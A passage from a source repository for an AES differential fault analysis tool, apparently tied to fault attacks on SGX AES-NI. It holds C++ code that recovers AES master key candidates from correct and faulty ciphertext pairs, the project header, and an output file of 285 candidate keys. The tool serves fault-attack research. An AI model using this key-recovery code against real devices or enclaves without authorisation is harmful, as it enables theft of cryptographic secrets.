250 |           isbox[
251 |           gm_0e[ isbox[ d[ x[ 0] ] ^ k[ x[ 0] ] ] ^ h[ y[ 0] ] ] ^
252 |           gm_0b[ isbox[ d[ x[ 1] ] ^ k[ x[ 1] ] ] ^ h[ y[ 1] ] ] ^
253 |           gm_0d[ isbox[ d[ x[ 2] ] ^ k[ x[ 2] ] ] ^ h[ y[ 2] ] ] ^
254 |           gm_09[ isbox[ d[ x[ 3] ] ^ k[ x[ 3] ] ] ^ h[ y[ 3] ] ] ]
255 |           ];
256 | 
257 |         uint8_t f1 = gm[1][
258 |           isbox[
259 |           gm_09[ isbox[ c[ x[ 4] ] ^ k[ x[ 4] ] ] ^ h[ y[ 4] ] ] ^
260 |           gm_0e[ isbox[ c[ x[ 5] ] ^ k[ x[ 5] ] ] ^ h[ y[ 5] ] ] ^
261 |           gm_0b[ isbox[ c[ x[ 6] ] ^ k[ x[ 6] ] ] ^ h[ y[ 6] ] ] ^
262 |           gm_0d[ isbox[ c[ x[ 7] ] ^ k[ x[ 7] ] ] ^ h[ y[ 7] ] ] ] ^
263 |           isbox[
264 |           gm_09[ isbox[ d[ x[ 4] ] ^ k[ x[ 4] ] ] ^ h[ y[ 4] ] ] ^
265 |           gm_0e[ isbox[ d[ x[ 5] ] ^ k[ x[ 5] ] ] ^ h[ y[ 5] ] ] ^
266 |           gm_0b[ isbox[ d[ x[ 6] ] ^ k[ x[ 6] ] ] ^ h[ y[ 6] ] ] ^
267 |           gm_0d[ isbox[ d[ x[ 7] ] ^ k[ x[ 7] ] ] ^ h[ y[ 7] ] ] ]
268 |           ];
269 | 
270 |         uint8_t f2 = gm[2][
271 |           isbox[
272 |           gm_0d[ isbox[ c[ x[ 8] ] ^ k[ x[ 8] ] ] ^ h[ y[ 8] ] ] ^
273 |           gm_09[ isbox[ c[ x[ 9] ] ^ k[ x[ 9] ] ] ^ h[ y[ 9] ] ] ^
274 |           gm_0e[ isbox[ c[ x[10] ] ^ k[ x[10] ] ] ^ h[ y[10] ] ] ^
275 |           gm_0b[ isbox[ c[ x[11] ] ^ k[ x[11] ] ] ^ h[ y[11] ] ] ] ^
276 |           isbox[
277 |           gm_0d[ isbox[ d[ x[ 8] ] ^ k[ x[ 8] ] ] ^ h[ y[ 8] ] ] ^
278 |           gm_09[ isbox[ d[ x[ 9] ] ^ k[ x[ 9] ] ] ^ h[ y[ 9] ] ] ^
279 |           gm_0e[ isbox[ d[ x[10] ] ^ k[ x[10] ] ] ^ h[ y[10] ] ] ^
280 |           gm_0b[ isbox[ d[ x[11] ] ^ k[ x[11] ] ] ^ h[ y[11] ] ] ]
281 |           ];
282 | 
283 |         uint8_t f3 = gm[3][
284 |           isbox[
285 |           gm_0b[ isbox[ c[ x[12] ] ^ k[ x[12] ] ] ^ h[ y[12] ] ] ^
286 |           gm_0d[ isbox[ c[ x[13] ] ^ k[ x[13] ] ] ^ h[ y[13] ] ] ^
287 |           gm_09[ isbox[ c[ x[14] ] ^ k[ x[14] ] ] ^ h[ y[14] ] ] ^
288 |           gm_0e[ isbox[ c[ x[15] ] ^ k[ x[15] ] ] ^ h[ y[15] ] ] ] ^
289 |           isbox[
290 |           gm_0b[ isbox[ d[ x[12] ] ^ k[ x[12] ] ] ^ h[ y[12] ] ] ^
291 |           gm_0d[ isbox[ d[ x[13] ] ^ k[ x[13] ] ] ^ h[ y[13] ] ] ^
292 |           gm_09[ isbox[ d[ x[14] ] ^ k[ x[14] ] ] ^ h[ y[14] ] ] ^
293 |           gm_0e[ isbox[ d[ x[15] ] ^ k[ x[15] ] ] ^ h[ y[15] ] ] ]
294 |           ];
295 | 
296 |         if ((f0 == f1) && (f1 == f2) && (f2 == f3))
297 |           candidates.push_back(k);
298 |         }
299 |       }
300 |     }
301 |   }
302 |   return candidates;
303 | }
304 | 
305 | /* post processing of subkey candidates */
306 | vector<State> postproc(vector<vector<State>> &v)
307 | {
308 |   vector<State> r;
309 |   for (size_t i = 0; i < v.size(); ++i)
310 |     for (size_t j = 0; j < v[i].size(); ++j)
311 |       r.push_back(reconstruct(v[i][j]));
312 |   return r;
313 | }
314 | 
315 | 
316 | /* reconstructs the master key from the 10-th round subkey */
317 | State reconstruct(State &k)
318 | {
319 |   array<uint32_t,44> sk;
320 |   sk.fill(0);
321 | 
322 |   for (size_t i = 0; i < 4; ++i)
323 |     for (size_t j = 0; j < 4; ++j)
324 |       sk[i] ^= k[4*i+j] << (24-8*j);
325 | 
326 |   size_t n = 10;
327 |   for (size_t i = 0; i < n; ++i)
328 |   {
329 |     sk[ 4*(i+1)   ] = sk[ 4*i   ] ^ ks_core( sk[ 4*i+2 ] ^ sk[ 4*i+3 ], n-i );
330 |     sk[ 4*(i+1)+1 ] = sk[ 4*i   ] ^ sk[ 4*i+1 ];
331 |     sk[ 4*(i+1)+2 ] = sk[ 4*i+1 ] ^ sk[ 4*i+2 ];
332 |     sk[ 4*(i+1)+3 ] = sk[ 4*i+2 ] ^ sk[ 4*i+3 ];
333 |   }
334 | 
335 |   n = sk.size();
336 |   State mk;
337 |   for (size_t i = 0; i < 4; ++i)
338 |     for (size_t j = 0; j < 4; ++j)
339 |       mk[4*i+j] =  ( sk[n - 4 + i] >> (24 - 8*j) ) & 0xff;
340 | 
341 |   return mk;
342 | }
343 | 
344 | 
345 | /* core of AES key schedule */
346 | uint32_t ks_core(uint32_t t, size_t r)
347 | {
348 |   uint32_t b = ROTL<uint32_t>(t,8);
349 |   uint32_t c = rcon[r] << 24;
350 |   for (size_t i = 0; i < 4; ++i)
351 |     c ^= sbox[ ( b >> (24-8*i) ) & 0xff ] << (24 - 8*i);
352 |   return c;
353 | }
354 | 
355 | 
356 | /* get keys from a multimap */
357 | vector<uint8_t> getKeys(multimap<uint8_t,uint8_t> m)
358 | {
359 |   vector<uint8_t> keys;
360 |   for ( auto it = m.begin(), end = m.end(); it != end; it = m.upper_bound(it->first)  ) { keys.push_back(it->first); }
361 |   return keys;
362 | }
363 | 
364 | 
365 | void printState(State x)
366 | {
367 |   for (size_t i = 0; i < x.size(); ++i) { printf("%02x",x[i] ); }
368 | }
369 | 
370 | 
371 | vector<pair<State,State>> readfile(const string file)
372 | {
373 |   vector<pair<State,State>> pairs;
374 | 
375 |   ifstream infile (file);
376 | 
377 |   if (infile.is_open())
378 |   {
379 |     string in;
380 |     while(getline(infile,in))
381 |     {
382 |       pair<State,State> cts;
383 |       istringstream iin ( in );
384 |       string x,y;
385 |       getline (iin, x, ' ');
386 |       getline (iin, y, ' ');
387 |       State c,d;
388 |       c.fill(0);
389 |       d.fill(0);
390 |       for (size_t i = 0; i < x.length(); i += 2 )
391 |       {
392 |         c[ i/2 ] = strtol(x.substr( i , 2 ).c_str(),0,16);
393 |         d[ i/2 ] = strtol(y.substr( i , 2 ).c_str(),0,16);
394 |       }
395 |       cts.first = c;
396 |       cts.second = d;
397 |       pairs.push_back(cts);
398 |     }
399 |     infile.close();
400 |   }
401 |   return pairs;
402 | }
403 | 
404 | 
405 | void writefile(vector<State> keys, const string file)
406 | {
407 |   FILE * outfile;
408 |   outfile = fopen (file.c_str(), "a");
409 | 
410 |   for (size_t i = 0; i < keys.size(); ++i)
411 |     {
412 |       for (size_t j = 0; j < keys[i].size(); ++j)
413 |         {
414 |           fprintf(outfile, "%02x",keys[i][j]);
415 |         }
416 |       fprintf(outfile, "\n");
417 |     }
418 |   fclose(outfile);
419 | }
420 | 
421 | 
422 | void help(){
423 |   printf("Usage: ./dfa c l f\n\n" );
424 |   printf("Parameters\n");
425 |   printf("%2sc: Number of cores >= 1.\n","");
426 |   printf("%2sl: Byte number of the AES state affected by the fault.\n%5sMust be in {-1,0,...,15}, where -1 means unknown.\n","","");
427 |   printf("%2sf: Input file with one or more pairs of correct and faulty ciphertexts.\n\n","");
428 | }
429 | 
430 | 
431 | int main (int argc, char **argv)
432 | {
433 |   if (argc != 4) { help(); return -1; }
434 | 
435 |   const size_t c = atoi(argv[1]); // number of cores
436 |   const int l = atoi(argv[2]); // fault location
437 |   const string f = argv[3]; // input file
438 | 
439 |   if (c < 0 || l < -1 || l > 15 || f.empty() ) { help(); return -1; }
440 | 
441 |   vector<pair<State,State>> pairs = readfile(f);
442 | 
443 |   /* set fault location range */
444 |   size_t j = 0;
445 |   size_t n = 0;
446 |   if (l == -1) { n = 16; } else { j = l; n = l+1;}
447 | 
448 |   for (size_t i = 0; i < pairs.size(); ++i)
449 |   {
450 |     printf("(%lu) Analysing ciphertext pair:\n\n",i);
451 |     printState(pairs[i].first);
452 |     printf(" ");
453 |     printState(pairs[i].second);
454 |     printf("\n\nNumber of core(s): %lu \n", c);
455 | 
456 |     /* create new output file */
457 |     stringstream ss;
458 |     ss << "keys-" << i << ".csv";
459 |     FILE * outfile;
460 |     const string name = ss.str();
461 |     outfile = fopen (name.c_str(), "w");
462 |     fclose(outfile);
463 | 
464 |     size_t count = 0;
465 |     while(j < n){
466 |       printf("----------------------------------------------------\n");
467 |       printf("Fault location: %lu\n",j);
468 |       vector<State> keys = analyse(pairs[i].first, pairs[i].second, j, c);
469 |       count += keys.size();
470 |       writefile(keys,name);
471 |       j++;
472 |     }
473 |     if ( l == -1 ) { j = 0; } else { j = l; } // reset j
474 |     printf("\n%lu masterkeys written to %s\n\n",count,name.c_str());
475 |   }
476 |   return 0;
477 | }
478 | 


--------------------------------------------------------------------------------
/sgx_aes_ni/dfa-aes-master/analysis/dfa.hpp:
--------------------------------------------------------------------------------
  1 | //
  2 | // Licensed by "The MIT License". See file LICENSE.
  3 | //
  4 | 
  5 | #ifndef DFA_H
  6 | #define DFA_H
  7 | #include <algorithm>
  8 | #include <array>
  9 | #include <climits>
 10 | #include <cmath>
 11 | #include <fstream>
 12 | #include <iostream>
 13 | #include <map>
 14 | #include <omp.h>
 15 | #include <set>
 16 | #include <sstream>
 17 | #include <stdint.h>
 18 | #include <stdio.h>
 19 | #include <stdlib.h>
 20 | #include <string>
 21 | #include <string.h>
 22 | #include <vector>
 23 | 
 24 | #include "tables.hpp"
 25 | 
 26 | using namespace std;
 27 | 
 28 | /* 4-byte array */
 29 | using KeyTuple = array<uint8_t, 4>;
 30 | 
 31 | /* 16-byte state */
 32 | using State = array<uint8_t, 16>;
 33 | 
 34 | /* data structure for differentials */
 35 | using DiffStat = array<multimap<uint8_t,uint8_t>, 16>;
 36 | 
 37 | /* data structure for vector of key candidate tuples */
 38 | using VKeyTuple = vector<KeyTuple>;
 39 | 
 40 | /* galois multiplication tables */
 41 | static map <uint8_t, const uint8_t*> gmt = { {0x01, gm_01}, {0x09, gm_09}, {0x0b, gm_0b}, {0x0d, gm_0d}, {0x0e, gm_0e}, {0x8d, gm_8d}, {0xf6, gm_f6} };
 42 | 
 43 | /* related bytes (column-wise) */
 44 | static const uint8_t rb[4][4] = { {0,7,10,13},{1,4,11,14},{2,5,8,15},{3,6,9,12} };
 45 | 
 46 | /* Maps a fault location 'l' to the correct set of fault deltas for the standard filter. Note: 'l' is enumerated column-wise */
 47 | static const size_t map_fault[16] = {0,1,2,3,3,0,1,2,2,3,0,1,1,2,3,0};
 48 | 
 49 | /* pointer to inverses of fault deltas in GF(256) for the standard filter (depend on the fault location) */
 50 | static const uint8_t* ideltas1[4][16] = {
 51 |   {gm_8d, gm_01, gm_8d, gm_01, gm_01, gm_f6, gm_01, gm_f6, gm_01, gm_8d, gm_01, gm_8d, gm_f6, gm_01, gm_f6, gm_01},
 52 |   {gm_01, gm_f6, gm_01, gm_f6, gm_01, gm_8d, gm_01, gm_8d, gm_f6, gm_01, gm_f6, gm_01, gm_8d, gm_01, gm_8d, gm_01},
 53 |   {gm_01, gm_8d, gm_01, gm_8d, gm_f6, gm_01, gm_f6, gm_01, gm_8d, gm_01, gm_8d, gm_01, gm_01, gm_f6, gm_01, gm_f6},
 54 |   {gm_f6, gm_01, gm_f6, gm_01, gm_8d, gm_01, gm_8d, gm_01, gm_01, gm_f6, gm_01, gm_f6, gm_01, gm_8d, gm_01, gm_8d}
 55 | };
 56 | 
 57 | /* pointer to inverses of fault deltas in GF(256) for the improved filter (depend on the fault location) */
 58 | static const uint8_t* ideltas2[4][4] = {
 59 |   {gm_8d,gm_01,gm_01,gm_f6}, {gm_f6,gm_8d,gm_01,gm_01}, {gm_01,gm_f6,gm_8d,gm_01}, {gm_01,gm_01,gm_f6,gm_8d}
 60 | };
 61 | 
 62 | /* indices for c,d and the 10-th round key k (improved fault equations) */
 63 | static const size_t indices_x[4][16] = {
 64 |   { 0,13,10, 7,  12, 9, 6, 3,   8, 5, 2,15,   4, 1,14,11},
 65 |   {12, 9, 6, 3,   8, 5, 2,15,   4, 1,14,11,   0,13,10, 7},
 66 |   { 8, 5, 2,15,   4, 1,14,11,   0,13,10, 7,  12, 9, 6, 3},
 67 |   { 4, 1,14,11,   0,13,10, 7,  12, 9, 6, 3,   8, 5, 2,15}
 68 | };
 69 | 
 70 | /* indices for the 9-th round key h (improved fault equations)*/
 71 | static const size_t indices_y[4][16] = {
 72 |   { 0, 1, 2, 3,  12,13,14,15,   8, 9,10,11,   4, 5, 6, 7},
 73 |   {12,13,14,15,   8, 9,10,11,   4, 5, 6, 7,   0, 1, 2, 3},
 74 |   { 8, 9,10,11,   4, 5, 6, 7,   0, 1, 2, 3,  12,13,14,15},
 75 |   { 4, 5, 6, 7,   0, 1, 2, 3,  12,13,14,15,   8, 9,10,11}
 76 | };
 77 | 
 78 | vector<State> analyse(State &c, State &d, const size_t l, const size_t cores);
 79 | 
 80 | DiffStat differentials(State &c, State &d, const size_t l);
 81 | 
 82 | DiffStat standard_filter(DiffStat x);
 83 | 
 84 | vector<VKeyTuple> combine(DiffStat x);
 85 | 
 86 | vector<vector<VKeyTuple>> preproc(vector<VKeyTuple> cmb, const size_t cores);
 87 | 
 88 | vector<State> improved_filter(State &c, State &d, vector<VKeyTuple> &v, const size_t l);
 89 | 
 90 | vector<State> postproc(vector<vector<State>> &v);
 91 | 
 92 | State reconstruct(State &k);
 93 | 
 94 | uint32_t ks_core(uint32_t t, size_t r);
 95 | 
 96 | vector<uint8_t> getKeys(multimap<uint8_t,uint8_t> m);
 97 | 
 98 | void printState(State x);
 99 | 
100 | vector<pair<State,State>> readfile();
101 | 
102 | void writefile(vector<State> keys, const string file);
103 | 
104 | static uint8_t EQ(const uint8_t c, const uint8_t d, const uint8_t k, const uint8_t* gm) {
105 |   return gm[ isbox[c^k] ^ isbox[d^k] ];
106 | }
107 | 
108 | template<typename T>
109 | static constexpr size_t bits(T = T{})
110 | {
111 |   return sizeof(T) * CHAR_BIT;
112 | }
113 | 
114 | template<typename T>
115 | static constexpr T ROTL(const T x, const unsigned c)
116 | {
117 |   return (x << c) | (x >> (bits(x) - c));
118 | }
119 | 
120 | template<typename T>
121 | static constexpr T ROTR(const T x, const unsigned c)
122 | {
123 |   return (x >> c) | (x << (bits(x) - c));
124 | }
125 | 
126 | #endif
127 | 


--------------------------------------------------------------------------------
/sgx_aes_ni/dfa-aes-master/analysis/keys-0.csv:
--------------------------------------------------------------------------------
  1 | 03dbed4b8134e6ba0d72fbba11c89cb4
  2 | b0d3fc980827ea19e489cb859bc9f143
  3 | f54d3242a1201616458819680e78cac5
  4 | 2d8b61961e18450c9552b64110f296b9
  5 | af1e9749893d10c6ddc15b887f296a16
  6 | fc8c27e10cedfea216980ebb92325fbc
  7 | b665c07c99702460032c25dda8a216ec
  8 | cb0db4ab2889ef866d22cf6b43596410
  9 | 30f3c8691e7510144a16360294248dbf
 10 | c4f7112d089f428b0c398f52827fbd99
 11 | c5c419c8a2c4a1677aae57ccfb7b7811
 12 | cb1dab6c8165a2bbb720a5b92af327cc
 13 | 2136e9d2a9164a04bdf86782400a0842
 14 | a6f64aca114369711ba245613f2d7749
 15 | 933109a28a2da0040c16859412d610c8
 16 | 0640989728b858979f76f445327a245b
 17 | 9d98acec25a8dc067ab749bf84ea8da2
 18 | ae75656c551ed91d4b667ce558e9ab1d
 19 | 2e9ac11e3745134a9276a9a1e15cdb88
 20 | 19350defb3b8d3c632f09e5b3bb0c878
 21 | 1fde0c18189073535c84c2d7d775cadc
 22 | 5f940ff779137b5517deb15ee6f1b5ee
 23 | ce8f27a946bc4f8ab926bc14959b1ef5
 24 | 0720812812dc83b8ef4ec49ecd619c2b
 25 | be56c2bc2a3bd020b1edd8f41ac201c1
 26 | 7f25b9ae7865de853fe8b1e372db4835
 27 | bc7f1b0b8cc84cea760d0404020d00a2
 28 | f27c853873f8c767f51da98fdd709e17
 29 | 7ed3a62a75e93a7c8130e0cea1ae1844
 30 | 247ccfd9d78cae14fde346f643e311d1
 31 | ee0df21ae77fb9dd26b86e4b5a031bd2
 32 | 8e7fa4d669fd435178e9b0175ee557fd
 33 | 3f7c50ac338d25a779700c313b776970
 34 | 938b24ca1d90a876f77770c3fd0a99e2
 35 | 1cc8ca56e258c9683a8e1b264ba78ea7
 36 | c36db8bf4ff5285a9f89e2388589170e
 37 | 4940c1d36d74be7eabed1b550558bcf6
 38 | fc8d65946000cacaf453b23e3e0ec6bf
 39 | 82f255d3c6b0030e0b6eacc7e15c7c4f
 40 | 802373358b7401998f6281e04ea05133
 41 | f5587890ec9abc686207c81f1d7b57da
 42 | 4599a91f2f239617812a013a3c87a35e
 43 | bcf189df386042e7e79ec70d5efd3467
 44 | dd1e617eda56781939e9bfd675da816a
 45 | d32459aedf23b1767b6de8e9a19bb0d5
 46 | 4a2515cad84f5a2c54cd6282c16e902c
 47 | b3f7439e74bb846458fdab9fa0da0ebe
 48 | c8aebcb2fdba1d1d80cf968f0681df28
 49 | 57f7fe4fcf392e59716f3f7bac426afe
 50 | 2f2732b672c6c5c0df72135d1919127d
 51 | 50380c574f13d968d37d658fa015f052
 52 | fed3ea46fac4105c4ad8c3630f99e574
 53 | 90226c34fff025fa59e23836fb85cc63
 54 | 83f9f01a157f69683d4c0f8e7f3acb63
 55 | 31cbaf3d71fbb8dfb0e980a930b078c4
 56 | 26bd1ea7bc1481e29f5ccf757d312c8c
 57 | b160ccb95555dd807255b85d7074e8e5
 58 | 558ede2a128b03570557419b888fd777
 59 | 769ac533e6fcf66138826639abbd50e0
 60 | 2a12e1e7891676989502a712f86f1e63
 61 | 8732cfb77b9a70146f6ab414cc09d50e
 62 | ffd968627fd33d9262f703ef28b01d61
 63 | 8d7c6f12824505f5413667ca897d81da
 64 | 4a22f7cd15095424265fe3a6a3f5ea97
 65 | 9fa26457298eac800d4cf5f6fc7b94cc
 66 | f30b5dbca1c2860ef3f8738e007b5cd8
 67 | 6ea08e849c72ad0ce06f09dc20d1bd09
 68 | cd2c079ee9e7678c2345ac1e1d9a862c
 69 | 232f2c46cb567029d369da938e19a9ee
 70 | 32398eae0e170ac28236bb7a85488676
 71 | 41e03b5346134fcfda25722505952234
 72 | 70af6bf001c692a8cfb37424a40943e1
 73 | 053cb4ea41c241d26588ea820e275746
 74 | 9642cf819c5ba53cfa1dbbe38b309549
 75 | 802635942088c8406631bf5f66ddfb27
 76 | 3c0f572971546dccc87c4d11f29f8d50
 77 | 22b0957caaaf01d5db51cb6bc9fef1c9
 78 | ea282c033840875ee355a767de2a605e
 79 | 53e25da81b9f26bd306c372240220333
 80 | bfe3138ba3be3908638f3e2173649ef7
 81 | d48ffd272363aaa29f4f20cb54bcef05
 82 | fdb267e4b9ea15d172a0b247909dac4e
 83 | 387da8aa363e650546a6f0a3a2999b7d
 84 | d4870bde51a64a7ea2315643ebb0e9d3
 85 | 155cf04d28e6fe3fa6bd9bb3190c1c30
 86 | 12c5c7383ca362ca820793cf2360043b
 87 | e13820bc89b27f2f3739da90d1e9788a
 88 | f9be9a33bf8c03624a53d1b747cf64a3
 89 | eca89949c44d0516b35664bd62d7e83e
 90 | 39b674eea8cc077ec73885abf84f0bc5
 91 | 1815529801cbb8fa542a45aa9700a2e1
 92 | 1000378da1d24ce85d781b4da6ae9947
 93 | a70385bacb5b0eec91712c2aa8bbd381
 94 | b9dffd3bdc83f13b07bcbec715934ddd
 95 | 995ae82d076d103cd1d1e2383775caec
 96 | 9dcbb8ce8277e7e831248a7fafecc68d
 97 | f82e61d021cac08d6015b8a72be03633
 98 | af273bb9ef5f01778977398e4562ecd4
 99 | 3c938a29babb0f33fe6aa223972ec4da
100 | 312eb2794e9fa098d00f7e537cad0384
101 | 407b7a1d8d2782a71621ff90fed89974
102 | d7a4aa2018c12b3353846db9ceefdc8d
103 | 2230597f114dbbf889609dfa7f3fe482
104 | 9121f8adfe9ca22d5201f0aa686c9078
105 | 6da842507b66fee8778f4ac7966e684b
106 | 1d0fa8e1a22e7afb820852d1891b64ac
107 | 5340a305a129ca290c59f6529466da7f
108 | beb2b20ff6420a35c9df69baa7437b6a
109 | 4f4dc753ba15526e30c442dd0439a18d
110 | ee81e76c0e95ad25d870996a5f392c72
111 | 45265d4102e11c746e7542f57eeef155
112 | d0437efe2c2ad5483f5b3517dcc318e8
113 | 1ddaa21708fea4933d800427b6e2bf89
114 | 62d52819a4fb073aa4aa3b61df8e0e5b
115 | 5853770ebec14adaef8bf5bbc8451052
116 | cb0bcf98142c29b8a5b541e0808b7c25
117 | bfcb65300f832473c1f45b8fe7e3657c
118 | b0e9d5b773f7066fa5537ac41ef76986
119 | e91b8cb423067849e92221cb8df29577
120 | 2d868128bf326a5d2ae1ef7e3a6aead1
121 | 9d1143be378b8c9ff00c650f77c44d9b
122 | 2e6ef17201eec5c2287a181aca8ef687
123 | 5d6ee5c7e99181bf8eb6b95cf71e1047
124 | 4506971de7e23f63b72027cf67215e8d
125 | f218244ffe0d60114a6406e8671de16b
126 | e26cb038dcb7ddcbe03b8f5015d22425
127 | 8a224af4834ffb8b4892d0bcd5738cd9
128 | c3a1b9c384c7ba776f29216ad6e3b7d6
129 | d79ea724fbd6dc29e39ea20fbad521d3
130 | 83d6f53ae5cedd1458d9c26e4d9022cd
131 | b91f8cfa7fbc4528c9a3a42c95e0bf97
132 | 3f768348e0029e97a3af3e49a619eb4a
133 | 842a3dfe84eaea34db4e660b4176971d
134 | f5541b534b7aeb9564ca6ec3e51cac7f
135 | 369fd5754ad7e8b3e24b078aade2c7d7
136 | 082f96b88dbec1351b68c02678823548
137 | aee3bea34431605acb44bfd8e4a164bb
138 | 8e29d03cd8bfaa0d32c76e8924b874db
139 | 5337bf5c2a2c7c9a620d67da5d1f3e23
140 | 4d66f22b15bb855baed1e9ea33ee99a2
141 | 1d488b8bde6847537430bcb082a57ef6
142 | 0c8c764c8f09a5b657b6276eb05ec371
143 | 36c5ffdfa8270279efeb79a6d4b77f67
144 | bfcd703e6f1b986aa2f6df46cd0f1235
145 | 0cdc2ebd821a9a2766303ad11a691e01
146 | a278167c647e3d4248bc6cb951049b1f
147 | 77d777843272f979382fb702c469e4c9
148 | a26314ac95905f46a64553f8fd967b55
149 | c8b3316db94fa20304c730e41243c951
150 | 21729eac8205b72ef52961d9a345110a
151 | 3e2dc8b95f0fd3bf7e7cf36f020f12ba
152 | 3cde59678065bf91e17e87e1685f7152
153 | 6730197f02c90b554960c11bd8784773
154 | 41ad17881bb7a8dac280d068592bbc22
155 | abe0ec876210c09ba0a1ab77fdd8a17c
156 | e70045e242031180e2975d65cd74e41c
157 | dab17e4789339ed6463a53e963e6b452
158 | 4a3995033adc22f1cb344c51081b5006
159 | 9a27309a5faaa565ee26903174eea588
160 | 071655b42ba4be26ffc8ab4b6c39bc1c
161 | 6434f33bd10f0607aa3e1fd6135dcdf9
162 | b7fe4f511330c71cc3f9e3ce41b1c11c
163 | aed2cdc4733df48bf6335db3cfa9f928
164 | 616b2783ecb2c2854c7a2ba967f494f4
165 | d53899234b063b589b349bc83d585ed9
166 | 765b723f3843b95f2d5c62c07be51974
167 | 7a0381707ba328c83a78cd7420693483
168 | 6bbd050479bb2d2e56e91397c187ee09
169 | bb49875afdd1a5f758d056f6400ef236
170 | deacdd599b37f035488709216f6ea8ac
171 | 39641a0c4cc1e0fc9591bb646d88d590
172 | 2a2a9719d4fb77af5a521eb87693d4a0
173 | a4a0c2b6c04875707a6011e6ff71efaf
174 | de7225833440ebaff2502d71f702a7da
175 | 9a94a16bcf1fadcec79b41744128e1b9
176 | 32b4ff08257a7ddb42d81001dd19fef3
177 | 96651616c1db08c1e2521750e9fb031d
178 | bfd6623169c50a06d3ed20043eb4f9c5
179 | ae6da741f06319fea72db715f6d21ffa
180 | 0a679f3bafd06e6d7a3c7df8381ebe49
181 | 87a940c4eceb61eacb4bb74f503c8922
182 | 4c61c3ccc9d8eba50fbe819f3907f5b9
183 | 0b59c2abf748af3d54b6e844c3655d03
184 | 0918c6e8ef5b2705b767f95cabaa2171
185 | e54f30eeea397947cadc5fb8a228fb07
186 | 5fac400a2e570e1ada81300466144570
187 | 97c5c632b12bfae39e86209cde05035b
188 | b3fe446da280b9ec9b063407b16bf62a
189 | 879e28183694c6a09c6e2592b2c00a16
190 | e67070e45888b173d0abfeb8012134fa
191 | 79db19f572bb77697eaa9cb4421a4f51
192 | ee0467458b46e8b90bfc91e83e1a1200
193 | 4704c66e89c260a49b60871cb6e25d67
194 | 1ff09c37d8f0b24c4c9f852c23a4b4cb
195 | 07e7011618a59f1bc5ba8c9e7b064f3a
196 | 33f6ccc165b86ee29a2f23ebcf7735e5
197 | a6cfbb2acca7929e34dc873b529f0fe5
198 | 9b1583aea98b42fdc9d103b0a91e9075
199 | 1e4d41020e2a3c9e82cd3bfc1cb27be0
200 | 650cba56de29d9ea13497c2556bd684a
201 | 57fe476c0a65729235d62aa3f76f3492
202 | 018ccabcf116bd9b782a326734787c4d
203 | f67aa351772e96b714d7e373c57b7102
204 | 9933e64a4b8f17fc9cbfe48bccb8779a
205 | e67f3e8bdc0f5d862eb853b6e5d13785
206 | 54941c240c2edc7656cdb158ee45758b
207 | ecb7159424e52893e1acc12edc758786
208 | a3100d0e881b1683d9898793b24322fa
209 | 5ca652f9e5598ccf4a7c7fd5b42658e5
210 | 0ef01ff68945bff75d4dd1ed34ce9e5b
211 | 0fd76b833ee06d0275df5b061788f1b7
212 | f8650ae3718bd721342b1ce1d04fd7d6
213 | 154841af6f9960658b654d88b048c4c2
214 | c21db683775c0eac43da77fe2c90b0e4
215 | a0026f0434725670d7a7a4db71bf3391
216 | 5a9eca57a5f23118e992420f87b40c38
217 | 811ab6f74ce6103a0ef9679eaf0f7d7a
218 | 8f3a1f3e9f246694deb6edb83798010d
219 | b919caf83dd15e19b235387f3cf2a7ab
220 | 092a94e31ba8692949c5fad9da170b4a
221 | c8be54c92528ecd9b8ebb4c76132af71
222 | 3db00bcd5f9804bc99e5e69b46483a68
223 | ace9f3bbcd735036bee5690c99d4b8a0
224 | bce66e6866bdf13151752de65c10815b
225 | 11d4f82f9e27920f46d08e8a60e9bb24
226 | 1b3a795118644168766af9a2d2d4c2b0
227 | 884f26e0f643d83eed7b1e34aef71bad
228 | 4708f0349bde7dc6168898f7af716625
229 | bb6eeca03ea08cbe6083b90bbfb0a25e
230 | 74173ae12d8edcab910e22a1ce40ce0e
231 | 4da5550c1fc7128382f3ea566d0d730b
232 | c2832a1a53ab2cade0739072ca0bd3b9
233 | 8c84c7d4f1816ab3071e6aca88dc7d7d
234 | e1bc45ed63a043790a3c706a47bd968f
235 | 356312ba3adf6783516bb79721e016f7
236 | d0d25957e87cd6a5b1be25a54e730ba0
237 | 99939d3b188cca10ded642c84b43f779
238 | 68d6f8b2d459c531d98a682508d9b695
239 | 2836e9c12ef27a819fd77b91d96eea28
240 | 3ab135f23e3c2e2037e43ff598c89555
241 | 6c36b17fde67834a601eff73894c4802
242 | f12aa7e92b58e13c05c256fd28175833
243 | 194033aee0b1c8becd159e6751ba9e66
244 | d020cdc2fd2dbd7014bda023822b7ada
245 | e1bc6cdb67770b74bc452d92d2825fc4
246 | 438e3a67817c4b60122283d2eaa41beb
247 | 03ffc9e295268e2a47a330ad7f9f1659
248 | 7603dc61698cdd305b0999c916f26c0f
249 | 052f60eb097338f82cf0fab1df9cf387
250 | 69b0e837e8b19968695dcd6b1cec5379
251 | 109e0f285edb7797167c51e7d0601aa3
252 | f25bccf60c72fed452bdabf102b53b40
253 | 72be74b2146ef2014241bed7e3794364
254 | cd3fde4458b71f76d34cfaf051619e92
255 | 0676c58c39f39b4fec933c8735af8fd3
256 | 96e68545c97260fe071c547417b0ea1e
257 | e588ab46e39fb2b52f212edbcd3ceeeb
258 | 02b78b860b82f7b17d401de5ac6fb794
259 | ac94ef0f5fb098538f85f2507921e7c7
260 | 2cc441227040e047d9dc61393f115946
261 | 2e73c8198b700ba892b09097c9915b42
262 | dea91ec6e03e10ae574861301bf0a5f6
263 | 8c189dcacde6a8ec33c3b38eed57b84f
264 | a51791ca08226e1bf23b53781760c927
265 | 5e523b6eac0e14a1f93e4d01316a3587
266 | a5e454ba7f9f51b1ed6cddf7c7405a94
267 | 76fd3bca03f80faf614afa6b9c5207ad
268 | 3bc31511c4cc44d4b4ce80158793a91d
269 | f58e3cf2a67004b1c8aeddb47864e282
270 | 616cab74f04a0dcd59df673e07b63443
271 | 379527a0919bcb294a88a15f8ce4a32a
272 | d8157d46cf036280550b812d4145330e
273 | 7066e02082b65fc8dafe0b9dea9c0d99
274 | 539d749a35cfd6075e6b706e2a5b159e
275 | 87f1e01d2b28eea44d6a137797c26e3e
276 | b75edb03464725080aac76bf969c0710
277 | bfda24497322326b25301353516c2a77
278 | 09c2065529712407d693247a38ce4ff8
279 | 705da4f3bbdc36502f1663d1ea179805
280 | a558989c836521d317c2278900cd8c55
281 | f9d6976ea69be85f4d20e7587ef1e2fc
282 | 2ce306e05a8940a8bb60d422815794aa
283 | 861c92fbbb99172bde318e677d89461d
284 | 1181d39d3151bb04b3faa4d403f97809
285 | ae9db67c72a746b11cc16e670d8e3619
